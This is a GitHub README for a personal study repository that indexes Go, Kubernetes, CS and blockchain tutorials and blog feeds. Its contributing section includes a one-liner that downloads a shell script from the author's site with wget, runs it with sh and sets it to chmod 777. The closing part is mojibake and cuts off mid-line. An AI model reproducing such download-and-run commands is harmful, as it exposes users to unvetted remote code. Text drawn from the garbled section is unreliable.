<a href="https://gitee.com/xxw3293172751/Block_Chain"><img src="https://img.shields.io/badge/gitee-%40xxw3293172751-green?logo=gitee" title="Gitee mirror for faster access in China"></a>
<a href="https://wakatime.com/@c445b3c6-a2bc-43a2-a24a-0828a17244b4" title="Time spent on this project" > <img src="https://wakatime.com/badge/user/c445b3c6-a2bc-43a2-a24a-0828a17244b4.svg"></a>
<a href="https://github.com/cubxxw/cs-awesome-Block_Chain/stargazers"><img alt="GitHub stars" src="https://img.shields.io/github/stars/3293172751/cs-awesome-Block_Chain?style=plastic"></a>
<a href="https://xxw.nsddd.top/s/wRSz"><img alt="Unthrottled personal cloud drive" src="https://img.shields.io/badge/cloud-xiongxinwei-red?logo=iCloud" title="Unthrottled personal cloud drive for browsing and downloads"></a>
<a href="https://trackgit.com"><img src="https://us-central1-trackgit-analytics.cloudfunctions.net/token/ping/la3dpo1i7zzecvro53al" alt="trackgit-views" /> </a>
</p>

<div align="center"> <a href = "https://github.com/cubxxw/cs-awesome-Block_Chain">🅱️GitHub</a> &emsp;&emsp; | &emsp;&emsp; <a href="https://interview.huihut.com">📚DocCub</a> </div>
<div align="center"> <a href = "readme_english.md">🔤English</a> &emsp;&emsp; | &emsp;&emsp; <a href = "README.md">🆑中文CN</a> </div>
<br>

<details><summary><b>💡 About</b></summary>
<p><a href='https://www.facebook.com/profile.php?id=100034435372354'>Facebook</a> | <a href='https://telsacoin.io/'>Website</a> | <a href='http://nsddd.top'>Blog</a> | <a href='https://t.me/smile3293172751'>Telegram</a> | <a href='https://twitter.com/xxw3293172751'>Twitter</a> | <a href='https://www.linkedin.cn/injobs/in/xiongxinwei-xiong-7606a0227'>Linkedin</a> | <a href='https://liberapay.com/xiongxinwei/donate'>Donate</a></p>
<p align='center'>
<a href="https://www.linkedin.cn/injobs/in/xiongxinwei-xiong-7606a0227" target="_blank"><img src="https://img.shields.io/badge/linkedin-xiongxinwei-yellowgreen?logo=linkedin&style=flat-square"></a>
<a href="https://twitter.com/xxw3293172751" target="_blank"><img src="https://img.shields.io/badge/twitter-%40xxw3293172751-informational?logo=twitter&style=flat-square"></a>
<a href="https://www.zhihu.com/people/3293172751" target="_blank"><img src="https://img.shields.io/badge/%E7%9F%A5%E4%B9%8E-%E9%93%BE%E5%AD%A6%E8%80%85%E7%A4%BE%E5%8C%BA-blue?logo=zhihu&style=flat-square"></a>
<a href="http://sm.nsddd.top/sm0d220ad72063197b9875379403f6c88.jpg" target="_blank"><img src="https://img.shields.io/badge/%E5%BE%AE%E4%BF%A1-smile-brightgreen?logo=wechat&style=flat-square"></a>
<a href="https://space.bilibili.com/1233089591" target="_blank"><img src="https://img.shields.io/badge/b%E7%AB%99-%E6%97%A0%E4%B8%8E%E4%BC%A6%E6%AF%94%E7%9A%84%E5%BE%97%E5%BE%97-red?logo=bilibili&style=flat-square"></a>
</p>
<p align='center'>
<a href="https://weibo.com/u/6248930985" target="_blank"><img src="https://img.shields.io/badge/%E5%BE%AE%E5%8D%9A-%E6%97%A0%E4%B8%8E%E4%BC%A6%E6%AF%94%E7%9A%84%E5%BE%97%E5%BE%97-critical?style=social&logo=Sina%20Weibo"></a>
<a href="https://github.com/cubxxw" target="_blank"><img
src="https://img.shields.io/badge/Github-xiongxinwei-inactive?style=social&logo=github"></a>
<a href="http://nsddd.top" target="_blank"><img src="https://img.shields.io/badge/%E5%8D%9A%E5%AE%A2-%40xiongxinwei-blue?style=social&logo=Octopus%20Deploy"></a>
</p>
</hr>

⚠️ This is the growth record of a rookie. If you also want to become an engineer, to work in backend-related roles, or to learn about blockchain, then it can help you 😎 —> <b>If you like it, please give it a ⭐ and bookmark it~</b>

🧠 Friends who like *Go* are welcome to join the *Go* self-study group (<a target="_blank" href="https://qm.qq.com/cgi-bin/qm/qr?k=ZZnzhuU8uGmIKT5btI9uiCRpasUeD8e2&jump_from=webapi&authKey=x1/NMrS1KpK7N8Rvj4IfLcKYSWnjtElgU6a3ubin1JmtReyuoIlyE/ZJ0VRlK25n"><img border="0" src="./images/group.png" alt="GoLang/Go language/self-study group" title="GoLang/Go language/self-study group"></a> *QQ* group number: [141984758](https://qm.qq.com/cgi-bin/qm/qr?k=ZZnzhuU8uGmIKT5btI9uiCRpasUeD8e2&jump_from=webapi&authKey=x1/NMrS1KpK7N8Rvj4IfLcKYSWnjtElgU6a3ubin1JmtReyuoIlyE/ZJ0VRlK25n))

⛓️ <b>Blockchain technology (also called distributed ledger technology)</b> is an internet database technology whose hallmarks are <font color ="gree">decentralization, openness and transparency, tamper-proof records, and privacy/anonymity 🤑</font>. The <a href="https://github.com/C-UB">CUB chain-learning club</a> is dedicated to building a <b>blockchain self-study education platform.</b>

💡 Sidebar table-of-contents options: [📚 DocCub docs](https://go.nsddd.top), 🗃️ [Github + TOC navigation](http://sm.nsddd.top/sm20221004130721.png?xxw@nsddd.top), and 😁 you can even press `.` on this page ➡️ [to open it in a vscode editing environment](https://nsddd.top/archives/githubdev)

👣 Math formulas may not display correctly on GitHub; the [:triangular_ruler: MathJax Plugin for Github](https://chrome.google.com/webstore/detail/mathjax-plugin-for-github/ioemnmodlmafdkllaclgeombjnmnbima) extension is strongly recommended.

📄 To save as PDF: open the <a href="https://go.nsddd.top">📚 DocCub docs</a> page in Chrome, collapse the left-hand table of contents, right-click - Print - choose "Save as PDF" as the target printer - save — [🖨️ preview of the printed first Go-language section.pdf](./images/copy.pdf))

🙏 If the repository's content contains errors or could be improved, an [issue](https://github.com/cubxxw/cs-awesome-Block_Chain/issues) or PR is welcome ([🧷 how to contribute](https://nsddd.top/archives/contributors)); suggestions or discussion can be raised in [#10](https://github.com/cubxxw/cs-awesome-Block_Chain/issues/10). As my own ability is limited, the knowledge points in this repository come from my original writing, reading notes, books, blog posts and so on; everything non-original has its source noted, and if anything was missed, please open an [issue](https://github.com/cubxxw/cs-awesome-Block_Chain/issues/new/choose). This repository follows the [CC BY-NC-SA 4.0 (Attribution-NonCommercial-ShareAlike)](https://github.com/huihut/interview/blob/master/LICENSE) license; please credit the source when republishing, and commercial use is not permitted.
</details>
</hr>
<br>

## 🔥 Introducing CubDoc

🈺 Since browsing on `GitHub` is not a great experience, the [CUB chain-learning club](https://github.com/C-UB) launched the `CubDoc` documentation format, rendered with `vuejs` and hosted on servers inside China (blazing fast :bullettrain_front:). It currently supports the following projects 🗃️:

+ [x] [:speedboat: Go language, basics to advanced](https://go.nsddd.top)
+ [x] [:speedboat: docker & k8s & cloud native](https://docker.nsddd.top)

<br>

## 🗓️ My Curated Subscriptions

#### Blog column

The articles published on the blog stand on their own: they are everything I have seen, gained, and learned since I began contributing to open-source projects, and I hope this model can succeed and be imitated. [👀 My blog](https://nsddd.top/)
It records a lot of high-quality content that is worth a look; if you want to subscribe via RSS ➡️ [click here]([https://nsddd.top/rss.xml](https://nsddd.top/posts/index.xml))

[<img align="left" alt="shenxianpeng | ZhiHu" width="22px" src="https://www.svgrepo.com/show/305628/zhihu.svg" />][zhihu]

[zhihu]: https://www.zhihu.com/people/3293172751

<a href="https://www.zhihu.com/people/3293172751" target="_blank"><img src="https://img.shields.io/badge/%E7%9F%A5%E4%B9%8E-%E9%93%BE%E5%AD%A6%E8%80%85%E7%A4%BE%E5%8C%BA-blue?logo=zhihu&style=flat-square"></a> <a href="http://sm.nsddd.top/sm0d220ad72063197b9875379403f6c88.jpg" target="_blank"><img src="https://img.shields.io/badge/%E5%BE%AE%E4%BF%A1-smile-brightgreen?logo=wechat&style=flat-square"></a>

<details><summary><b>📚 My blog feed (updated weekly❗)</b></summary>
</br>
🔥 The blog column <b>auto-updates once every workday at 11:59 (deployed with actions)</b>; if you like an article, follow and give it a 👍~
<!-- My-Blog:START -->
- [Harnessing Language Model Applications with LangChain: A Developer's Guide](https://nsddd.top/zh/posts/harnessing-language-model-applications-with-langchain-a-developer-is-guide/)
- [Exploring Large Language Models (LLMs): AI Pioneers in Understanding and Generating Human Language](https://nsddd.top/zh/posts/exploring-large-language-models-llms-pioneering-ai-understanding-generation-human-language/)
- [Crafting Your Career Pathway: A Guide to Open-Source Resume Builders and Expert Resume Tips](https://nsddd.top/zh/posts/crafting-your-career-pathway-a-guide-to-open-source-resume-builders-and-expert-resume-tips/)
- [An OpenIM Troubleshooting Guide Distilled from My Career](https://nsddd.top/zh/posts/troubleshooting-guide-for-openim/)
- [Navigating the Open-Source Landscape and Open-Source Business Models](https://nsddd.top/zh/posts/navigating-the-open-source-landscape/)
- [The Sora Ease Guide: Mastering Sora AI for Developers](https://nsddd.top/zh/posts/sora-ease-guide-mastering-sora-ai-for-developers/)
- [2023, the Starting Point of My Journey — Wandering at the Edge of the World](https://nsddd.top/zh/posts/in-2023-i-was-wandering-at-the-edge-of-the-world/)
- [Exploring Sora: a Technical Discussion, and How Ordinary People and Developers Can Use Sora to Change the World](https://nsddd.top/zh/posts/exploring-sora-technology-for-enthusiasts-and-developers/)
- [Two Swords Joined: the Art of Project Management Combining GitHub and Google Workspace](https://nsddd.top/zh/posts/combining-github-and-google-workspace-for-project-management/)
- [Brain-Friendly English Learning Strategies: Tools and Techniques Explained](https://nsddd.top/zh/posts/brain-friendly-english-learning-strategies-tools-and-techniques-explained/)
- [The Magic of the Flow State: a Guide to Focus and Well-Being](https://nsddd.top/zh/posts/flow-state/)
- [GTD and the Four-Quadrant Rule in Practice](https://nsddd.top/zh/posts/gtd-and-the-four-quadrant-rule-practice/)
- [The go: Directives in Go Source Code && Go Automation Tools](https://nsddd.top/zh/posts/directives-and-the-use-of-automation-tools/)
- [Concurrent Type Checking and Cross-Platform Development in Go](https://nsddd.top/zh/posts/concurrent-type-checking-and-cross-platform-development-in-go/)
- [Learning Vector Databases](https://nsddd.top/zh/posts/vector-database-learning/)
- [OpenIM: Building an Efficient Version-Control and Testing Workflow](https://nsddd.top/zh/posts/openim-building-an-efficient-version-control-and-testing-workflow/)
- [Year One of AI: Emerging Challenges and Trends in 2024](https://nsddd.top/zh/posts/emerging-challenges-and-trends-in-2024/)
- [Review and Outlook: My 2023 Annual Summary](https://nsddd.top/zh/posts/2023-annual-summary-reflections-and-aspirations/)
- [Thoughts on Open-Source Commercialization &
Notes and Takeaways from the Global Traffic Conference (GTC)](https://nsddd.top/zh/posts/openim-open-source-business-journey/)
- [GitOps in Practice and Theory: a Deep Dive into Kubernetes Deployment Strategies](https://nsddd.top/zh/posts/gitops-practice-theory-part/)
- [Deployment and Design of the Management Backend and Monitoring](https://nsddd.top/zh/posts/deployment-and-design-of-management-backend-and-monitoring/)
- [An Advanced Hugo Tutorial](https://nsddd.top/zh/posts/hugo-advanced-tutorial/)
- [A Kubernetes Kustomize Study Guide](https://nsddd.top/zh/posts/kubernetes-for-kustomize-learning/)
- [Designing an Enterprise Image Registry for OpenIM with Harbor](https://nsddd.top/zh/posts/openim-use-harbor-build-enterprise-mirror-repositories/)
- [Learning Automated Testing (Part 1)](https://nsddd.top/zh/posts/learn-about-automated-testing/)
- [The Kubernetes Control Plane — Kubectl in Detail](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-kubectl/)
- [The Kubernetes Control Plane — the Scheduler](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-scheduler/)
- [Kubernetes CNI, CRI, and CSI Explained](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-cni-csi-cri/)
- [A Deep Dive into the Kubernetes kube-apiserver](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-kube-apiserver/)
- [A Deep Dive into Kubernetes Components: etcd](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-etcd/)
- [Simplifying Parameter and Port Configuration for Kubernetes Deployments with Config Files](https://nsddd.top/zh/posts/openim-cluster-deployment-parameter-passing-policy/)
- [OpenIM's Cluster Design | Kubernetes Deployment | Proposal Discussion | Meeting Summary](https://nsddd.top/zh/posts/openim-cluster-deployment-scheme-of/)
- [Learning to Ask Questions in Open-Source Communities](https://nsddd.top/zh/posts/the-art-of-asking-questions-in-open-source-communities/)
- [The Advanced Pursuit of Automation: What Is Prow, and Why Does Kubernetes Need It](https://nsddd.top/zh/posts/prow-ecological-learning/)
- [A Complete Open-Source Contribution Guide (a Handbook for First-Time Contributors)](https://nsddd.top/zh/posts/open-source-contribution-guidelines/)
- [A Summary of My Practice: Designing Conventions for an Open-Source Community](https://nsddd.top/zh/posts/advanced-githook-design/)
- [GoReleaser: Automating Your Software Releases](https://nsddd.top/zh/posts/go-release-tools/)
- [My First Blog](https://nsddd.top/zh/posts/my-first-blog/)
- [About My Hugo Blog (a Tutorial)](https://nsddd.top/zh/posts/my-hugo/)
- [A Quick Read of the Open-Source Project Sealos' Source Code](https://nsddd.top/zh/posts/read-openim-project-sealos-openim-source-code/)
- [How I Designed OpenIM's Standard Development Flow, Agile System & Lean Model under DevOps](https://nsddd.top/zh/posts/openim-devops-design/)
- [How I Elegantly Designed OpenIM's Multi-Process Management Strategy](https://nsddd.top/zh/posts/openim-multi-process-management/)
- [How to Install and Use Auto-GPT, the Autonomous AI Tool](https://nsddd.top/zh/posts/use-auto-gpt/)
- [Go Debugging and Testing, and Learning the dlv Debugger](https://nsddd.top/zh/posts/use-go-tools-dlv/)
- [Advanced Techniques for GitHub Actions](https://nsddd.top/zh/posts/github-actions-advanced-techniques/)
- [OpenIM's Offline Deployment Design](https://nsddd.top/zh/posts/openim-offline-deployment-design/)
- [A Guide to Staged Growth in Open Source](https://nsddd.top/zh/posts/stage-growth-of-open-source/)
- [Project Management, from Theory to Practice](https://nsddd.top/zh/posts/project-management-from-theory-to-practice/)
- [Designing a Multi-Architecture Image Build Strategy for OpenKF](https://nsddd.top/zh/posts/openkf-multi-architecture-image/)
- 
[A Guide of Conventions for Remote Work: the OpenIM Remote Team Collaboration Agreement v1.3](https://nsddd.top/zh/posts/openim-remote-work-culture/)
- [Cross-Platform and Multi-Architecture Compilation Design](https://nsddd.top/zh/posts/cross-platform-compilation/)
- [Kubernetes: an Article to Get Started Quickly](https://nsddd.top/zh/posts/kubernetes-an-article-to-get-started-quickly/)
- [Join Our Blockchain Learning Platform Project](https://nsddd.top/zh/posts/participating-in-this-project/)
<!-- My-Blog:END -->
</details>
</hr>
<br>

#### Zhihu column

🥰 Subscribe to the [cloud-native featured articles column](https://www.zhihu.com/column/c_1496496113348206594) on my [Zhihu account](https://www.zhihu.com/people/3293172751).

</br>
<details><summary><b>📚 My Zhihu article feed (updated weekly❗)</b></summary>
</br>
🔥 The Zhihu column <b>auto-updates once every workday at 11:59 (deployed with actions)</b>; if you like an article, follow and give it a 👍~
<!-- ZHIHU:START -->
- [Automated Testing Practices and Strategies for Open-Source Go Projects on GitHub in the Cloud-Native Space](https://zhuanlan.zhihu.com/p/664338584)
- [Building an Enterprise-Grade Image Registry for OpenIM with Harbor](https://zhuanlan.zhihu.com/p/662935033)
- [OpenIM's Multi-Process Management Strategy](https://zhuanlan.zhihu.com/p/652047787)
- [OpenIM Offline Deployment](https://zhuanlan.zhihu.com/p/651917752)
- [git cherry-pick course](https://zhuanlan.zhihu.com/p/649283181)
- [The Standard DevOps Design for OpenIM](https://zhuanlan.zhihu.com/p/648188241)
- [GO Gorelease](https://zhuanlan.zhihu.com/p/648187762)
- [OpenIM standardization](https://zhuanlan.zhihu.com/p/645182674)
- [Learn GitHub Actions in One Article](https://zhuanlan.zhihu.com/p/643085910)
- [kubecub — Helping Newcomers Build Open-Source Projects](https://zhuanlan.zhihu.com/p/634020346)
- [Go Language Tool Packages](https://zhuanlan.zhihu.com/p/631662028)
- [K8s Deep Dive: the Operator Client Explained](https://zhuanlan.zhihu.com/p/629622839)
- [Kubernetes Community Conventions](https://zhuanlan.zhihu.com/p/629622183)
- [Advanced Githook Design](https://zhuanlan.zhihu.com/p/629617458)
- [A Roundup of CloudNative / Kubernetes Learning Resources](https://zhuanlan.zhihu.com/p/614921043)
- [Advanced Traffic Management with Istio](https://zhuanlan.zhihu.com/p/614775174)
- [Kubernetes Concepts and Architecture](https://zhuanlan.zhihu.com/p/611169064)
- [Dissecting Docker Internals (Complete)](https://zhuanlan.zhihu.com/p/610939386)
- [A Makefile Guide for Go](https://zhuanlan.zhihu.com/p/607940899)
- [Go Project Design and Development Workflow](https://zhuanlan.zhihu.com/p/607192022)
<!-- ZHIHU:END -->
</details>
</hr>
<br>

## 📖 The Go Language

#### 🏷️ Foreword

Learning `Go` starts from the official documentation, the [official Go programming guide](https://golang.org/#); for a suitable learning path, see the [Go language roadmap](go-advancend/go_route.md) (🎈 contains plenty of Go project resources and collections of online resources).

```mermaid
graph LR
A[Programmer fundamentals] ==> B[Go basics] ==> C[Essential development skills] ==> D[100 advanced Go articles] ==> E[Advanced Go chapters]
```

+ 🔱[The official Go programming guide](https://golang.org/#)
+ 🚧[Go roadmap and resource collection (update 2023)](go-advancend/go_route.md)

#### 🔖 Core

**The core Go programming series: the basics were recorded over 30 days, followed by 100 advanced articles; the expert chapters cover Go's low-level implementation, the runtime, how the scheduler works, and Go design patterns~**

⚠️ All of it has now been migrated to ➡️ [CubDoc🧷](https://go.nsddd.top/)

+ [x] [🖱️ GO basics🔥](awesome-golang/README.md)
+ [x] [🖱️ 100 advanced Go articles🔥](awesome-golang/Gomd_super/README.md)
+ [x] [🖱️ Advanced Go](awesome-golang/go-advancend/README.md)
+ [ ] [🖱️ MIT 6.824 
Notes](awesome-golang/mit-6-824/README.md)

#### 📝 Supplement

Studying open-source projects contributes enormously to our growth; drawing on my own open-source experience I wrote [this piece: 🎯 The Open-Source Road: Crossing Eight Stages to Become a Standout in the Industry](https://nsddd.notion.site/f8854a0f60d346d98b9eb2ccb6eaef8f). Like [🧋 A Growth Trajectory for Learning Kubernetes](https://nsddd.notion.site/CloudNative-Kubernetes-2f278e98ed274999829333272415c72d), that article will be updated over the long term, and you are welcome to contribute to it and keep it complete~. The [k8s-iam](https://github.com/cubxxw/k8s-iam) project is my k8s-iam project built by combining Kubernetes and iam, two outstanding projects; it studies and re-implements the [enterprise-grade iam project](https://github.com/marmotedu/iam/) and writes up the open-source documentation and technical details. The iam tech stack covers development-environment setup, code design, common packages, HTTP, CLI clients, RESTful design, database operations, Swagger docs, cache mechanisms, business-logic handling, development conventions, API debugging, deployment methods, and cloud-native architecture design. If you are interested, let's read and learn it together.

🥇 Naming conventions and a project's directory structure 📇 are also very important for a qualified engineer. Below are the basics that a qualified developer 🤵 must master.

+ [🖱️ Go's package management tool — go mod](Gomd_super/mod.md)
+ [🖱️ Hot-reload compilation with Go air](Gomd_super/go-air.md)
+ [🖱️ Naming rules and code conventions](Gomd_super/name.md)
+ 🖱️[Go project directory structure](Gomd_super/catalogue.md)
+ 🖱️[Go files and encoding handling](Gomd_super/go_file.md)
+ 🖱️[Regular expressions](Gomd_super/zhenze.md)
+ 🖱️[Bit-manipulation tricks](Gomd_super/bitwise.md)

> Some other Go websites and blogs worth a look
>
> + [Go interview questions](https://www.topgoer.cn/docs/gomianshiti/mianshiti)
> + [The official Go docs in Chinese](http://word.topgoer.com/)
> + [Go expert programming](http://wen.topgoer.com/docs/gozhuanjia/gogfjhk)

<br>

## 👀 Cloud Native

💡 This is a repository about the cloud-native space, touching on docker, Kubernetes, and cloud-native knowledge — including docker's architecture and low-level implementation, and Kubernetes' architecture, principles, and ecosystem, along with source-code reading. There is also knowledge from other Cloud Native areas, plus studies of the various CNCF open-source community projects.

+ [x] [docker](awesome-docker-kubernetes/README.md)
+ [x] [Kubernetes](awesome-docker-kubernetes/Cloud-Native-k8s/README.md)
+ [x] [CloudNative](awesome-docker-kubernetes/Cloud-Native/README.md)

## 📚 CS Series

The CS series is selected from [🎉awesome-cs-course](https://github.com/cubxxw/awesome-cs-course); it covers notes on operating systems, the csapp series, algorithms and data structures, computer networking, `linux`, `java`, `python`, `C/C++`, `vuepress`, `gitbook`, `nodejs`, `vuejs`, `halo`, `redis`, `hugo`, `nginx`, `nosql`, `mysql`, `JavaScript`, `git`, `markdown`, `web` front-end and more; for the rest, head to the [AWESOME CS course repository](https://github.com/cubxxw/awesome-cs-course/)

+ [x] [The complete Java book☕](https://github.com/cubxxw/awesome-cs-course/blob/master/java/README.md)
+ [x] [Assembly learning🔥](汇编/README.md)
+ [x] [Software engineering](./软件工程&系统设计和架构/README.md)
+ [x] [Algorithms and data structures (LeetCode problem log)](https://github.com/cubxxw/LeetCode/)
+ [x] [Computer networking🔥](./web/README.md)
+ [x] [Operating systems — OS🔥](https://github.com/cubxxw/os)
+ [x] [Must-have CS skills🔥](cs/README.md)

<br>

## 📘 Essential Development Skills
🧋 To develop ordinary programs or do blockchain ⛓️ development, you must [be familiar with Linux commands](https://github.com/cubxxw/awesome-cs-course/blob/master/linux/README.md) and [team development with git](https://github.com/cubxxw/awesome-cs-course/blob/master/Git/README.md); building on [docker containers](docker/README.md) lets us quickly set up tools and environments and migrate development environments and chain code (blockcode); and [cryptography and information security](cryptology/README.md) is not just something blockchain engineers must learn — it is an indispensable skill for every IT practitioner going forward. We all want our systems to be more secure, don't we 📵.

⚠️ `Docker`, `K8s`, `sealos`, and `cloud native` have all been migrated to ➡️ [CubDoc🧷](https://docker.nsddd.top/)

+ [x] 🖱️ [Linux from beginner to master🔥](https://github.com/cubxxw/awesome-cs-course/blob/master/linux/README.md)
+ [x] 🖱️ [Git — the must-have tool🔥](https://github.com/cubxxw/awesome-cs-course/blob/master/Git/README.md)
+ [x] [🖱️ Docker/k8s/cloud native🔥](docker/README.md)
+ [x] [🖱️ Cryptography and information security🔥](cryptology/README.md)

<br>

## 📔 Blockchain Navigation

<font size = 2>I believe world history can be described with two sentences: what is long divided must unite, and what is long united must divide. Blockchain will be the new technology that catalyzes the next era of "what is long united must divide". The birth of blockchain has forged a new era; our faith is built upon a mathematical algorithm — In math we trust. — Zhang Shoucheng</font>

:spider_web: This is a web2 world — or rather, the whole internet industry may soon be transformed; yes, it will all step into the world of web3

> 🔥 I am deeply convinced: blockchain may not be able to make this world distributed, but it can rid the world of middlemen. You will no longer lose a game just because the game you play collapses~

What foundational knowledge does working in blockchain require? Have a look at [what blockchain development requires](C_Universal_Brockchain\chain.md); you will want a [blockchain engineer roadmap](./blockchain/route.md), and perhaps you can find inspiration in some blockchain projects: [🔗 blockchain public-interest projects (NFT + public chain / consortium chain / private chain)](blockchain/区块链公益项目/README.md). And how are blockchain [consensus algorithms](blockchain/README.md) actually implemented?
+ [x] [🔗 Blockchain engineer roadmap](./blockchain/route.md)
+ [x] [🔗 What does blockchain development require❓](C_Universal_Brockchain\chain.md)
+ [x] [🔗 Blockchain public-interest projects (NFT + public chain / consortium chain / private chain)](blockchain/区块链公益项目/README.md)
+ [x] [🔗 Consensus algorithms — implemented in Go](./blockchain/README.md)

<br>

## :b: Blockchain Tutorials

💱 The blockchain series contains blockchain tutorials — mainly `eth`, `btc`, and the consortium chain `fabric` from the Hyperledger organization — and extends new technologies on top of these tutorials: `git`, `ipfs`, cryptography, and consensus algorithms.

📮 This is also the ultimate goal of our `C-UB` community: we want to build a learning platform for everyone that is unlike any other, fusing all the new technologies (`ipfs`, `git`, `k8s`, `Kafka`) — a web3-based c-ub community that belongs to every one of us! Perhaps it will have what it takes to become a pioneer of the next era and completely change how humans collaborate. When people trust each other more, efficiency goes up.

🚸 See also the chain-learning project [C-Universal Blockchain](https://github.com/c-ub)

> Like Bitcoin, Ethereum's underlying framework is a blockchain protocol; a blockchain is essentially a distributed database system that applies cryptography. It is recommended to read the **[Ethereum whitepaper](https://github.com/ethereum/wiki/wiki/%5B%E4%B8%AD%E6%96%87%5D-%E4%BB%A5%E5%A4%AA%E5%9D%8A%E7%99%BD%E7%9A%AE%E4%B9%A6)** (requires golang programming basics)
>
> <div align="center">
> <a href="eth/TOC.md">
> <img src="https://sm.nsddd.top//typora/image-20220630192622583.png?mail:3293172751@qq.com" alt="Learning blockchain" style="zoom: 20%;" />
> </a></div>

+ [x] [🖱️ Blockchain tutorials🔥](C_Universal_Brockchain/README.md)
+ [x] [🖱️ web3 and smart contracts](eth/README.md)
+ [x] [🖱️ A guide to blockchain technology](chainbrock-learning/SUMMARY.md)

> An enterprise-grade [hands-on blockchain tutorial](https://learnblockchain.cn/books/enterprise/)

<br>

<!-- ## AI tutorials -->

## 🗃️ Projects

For easier management, I keep all of my knowledge repositories, and the repositories cloned for contributing to open-source projects, under my personal account [cubxxw](https://github.com); all project- and convention-related repositories live in the community I created, [kubecub](https://github.com/kubecub), so that everyone can join and learn; and all automation-related accounts are driven by the [robot (kubbot)](https://github.com/kubbot) bot for automation and control.

I have taken part in many top open-source communities, including [sealer](https://github.com/sealerio/sealer), [sealos](https://github.com/labring/sealos), [Kubernetes](https://github.com/kubernetes/kubernetes/), [OpenIM](https://github.com/OpenIMSDK), [K8sgpt](https://github.com/k8sgpt-ai/k8sgpt), [Horizon](https://github.com/horizoncd/horizon/), and the open-source community I built myself, [Kubecub](https://github.com/kubecub). kubecub holds the many open-source conventions I have distilled, with code and project conventions summarized across its repositories. Moreover, Kubecub and OpenIM use the [🤖 robot (kubbot)](https://github.com/kubbot) I created to heavily automate PRs and Issues. kubecub's mission is to serve every developer who wants to learn and create: you can use our automation tools and templates to build your own open-source project and bring in more people to collaborate with you and review code.

Along the way I have accumulated a lot of open-source experience, recorded in my [blog](https://nsddd.top); many of the proposals, the growth notes from contributing, and everything learned are recorded in the [CloudNative](https://docker.nsddd.top/Cloud-Native/) knowledge base.

> <p align = "center" color="red">
> <b> kubecub (the kubecub open-source community)</b>
> </p>
>
> <div align="center">
> <a
href="https://github.com/kubecub"> > <img src="http://sm.nsddd.top/sm202305242215086.png" alt="twitter_header_photo_1" style="zoom: 20%;" /> > </a></div> > > ๆฌข่ฟŽๅŠ ๅ…ฅ kubecub ็คพๅŒบไธ€่ตทๅญฆไน ใ€ไธบๅผ€ๆบๅš่ดก็Œฎ ! ไธบไบ†ๆ–นไพฟๆฏไธ€ไฝๅผ€ๆบ็ˆฑๅฅฝ่€…ไบคๆตๅ’Œๅญฆไน ๏ผŒๆˆ‘ไปฌๅœจ slack ไธญ้›†ๆˆไบ† ๅพˆๅคš่‡ชๅŠจๅŒ–ๅทฅๅ…ทไปฅๅŠ AI๏ผŒๆฌข่ฟŽๅคงๅฎถ [๐Ÿ”ฅๅŠ ๅ…ฅ Slack](https://join.slack.com/t/kubecub/shared_invite/zt-1se0k2bae-lkYzz0_T~BYh3rjkvlcUqQ)ใ€‚ ## โœจ ๅ‚ไธŽ่ดก็Œฎ๐Ÿ’• **[๐Ÿซต ๅ‚ไธŽ่ดก็Œฎ๐Ÿ’–โค๏ธโ€๐Ÿฉน๐Ÿ’“๐Ÿ’ž](https://nsddd.top/archives/contributors)** **[๐Ÿ˜ ็”š่‡ณไฝ ๅฏไปฅๅœจ่ฟ™ไธช็•Œ้ขๆŒ‰ไธ‹`.`่ฟ›ๅ…ฅvscode็ผ–่ฏ‘็Žฏๅขƒ](https://nsddd.top/archives/githubdev)** **่ฆๆฑ‚๏ผš** + [ไฝ ้œ€่ฆๅญฆไผšไฝฟ็”จmarkdown๐Ÿ–ฑ๏ธ](https://github.com/cubxxw/awesome-cs-course/blob/master/markdown/README.md) + [็ฌฆๅˆGoogleไปฃ็ ่ง„่Œƒ](https://zh-google-styleguide.readthedocs.io/en/latest/google-cpp-styleguide/) <details><summary><b>๐Ÿซก ๅ…‹้š†ๆญคไป“ๅบ“ๅˆฐๆœฌๅœฐ</b></summary> <pre><code>git clone https://ghproxy.com/https://github.com/cubxxw/Block_Chain.git ่œ้ธŸ็š„ๆˆ้•ฟๆ‰‹ๅ†Œ </code></pre> <pre><code>wget -c -d -O gitsync.sh https://sm.nsddd.top/uploads/2022/10/27/Y0iHb6ix_gitsync.sh?attname=gitsync.sh && echo "gitsync.sh" >> .gitignore && sh gitsync.sh ่ฟ™้‡Œๅ†™ๆไบคไฟกๆฏ~ && chmod 777 gitsync.sh </code></pre> </details> <br> <font size = 2>๐ŸŽฏ ๅฆ‚ๆžœไฝ ไนŸๆƒณๅฏนๆœฌ้กน็›ฎๅšๅ‡บ่ดก็Œฎ๏ผŒ้‚ฃไนˆไฝ ๅฏไปฅๅ…ˆๆŠŠ่ฏฅ้กน็›ฎ่ฟ›่กŒ [fork](https://github.com/cubxxw/cs-awesome-Block_Chain/fork)ๆˆ–่€… `git clone` ๅˆฐๆœฌๅœฐ๏ผˆๆŽจ่ๅ…ˆ็”จย [fock](https://github.com/cubxxw/cs-awesome-Block_Chain/fork)ๅˆฐ่‡ชๅทฑไป“ๅบ“๏ผŒ็„ถๅŽๅ†cloneๅˆฐๆœฌๅœฐ๏ผŒๅฏนๆœฌๅœฐ่ฟ›่กŒๆ“ไฝœ๏ผŒๆœ€ๅŽไปŽ่‡ชๅทฑไป“ๅบ“่ดก็Œฎ๏ผŒ็„ถๅŽ่‡ชๅทฑๅปบ็ซ‹ไธ€ไธชๅˆ†ๆ”ฏ `your-branch`๏ผŒ็„ถๅŽไธŠไผ ่ต„ๆ–™ๅˆฐ ๅฏนๅบ”็›ฎๅฝ• ไธ‹๏ผŒๅ›พ็‰‡ไฟกๆฏๅฏไปฅไธŠไผ ๅˆฐ` /images`๏ผŒ็„ถๅŽๆ›ดๆ–ฐ `README`ใ€‚ </font> ## [![Repography logo](https://images.repography.com/logo.svg)](https://repography.com) / Recent activity [![Time period](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_badge.svg)](https://repography.com) ![Alt](https://repobeats.axiom.co/api/embed/7053fe17b2bd9f88a0015474635e09cff7dc1ee2.svg "Repobeats analytics image") [![FOSSA 